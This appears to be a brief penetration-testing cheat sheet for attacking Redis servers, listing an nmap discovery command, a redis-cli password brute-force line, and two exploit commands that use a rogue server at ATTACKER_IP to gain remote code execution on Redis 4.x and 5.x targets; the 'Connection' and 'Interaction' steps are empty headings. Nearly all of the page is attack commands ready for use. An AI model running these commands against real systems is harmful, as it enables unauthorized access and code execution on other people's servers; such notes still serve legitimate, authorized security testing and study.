Redis
1) Nmap Scan
nmap -p 6379 --script "redis-info" IP2) Brute force
redis-cli -h <ip> -p 6379 -a <password_to_try>3) Exploitation
These exploits work on Redis 4x and Redis 5x versions
python3 redis-rogue-server.py --lhost=ATTACKER_IP --lport 6379 --rhost=TARGET_IP --rport 6379python3 redis-rce.py -r TARGET_IP -p 6379 -L ATTACKER_IP -P ATTACKER_PORT -f ../redis-rogue-server/exp.so -v4) Connection
5) Interaction
Last updated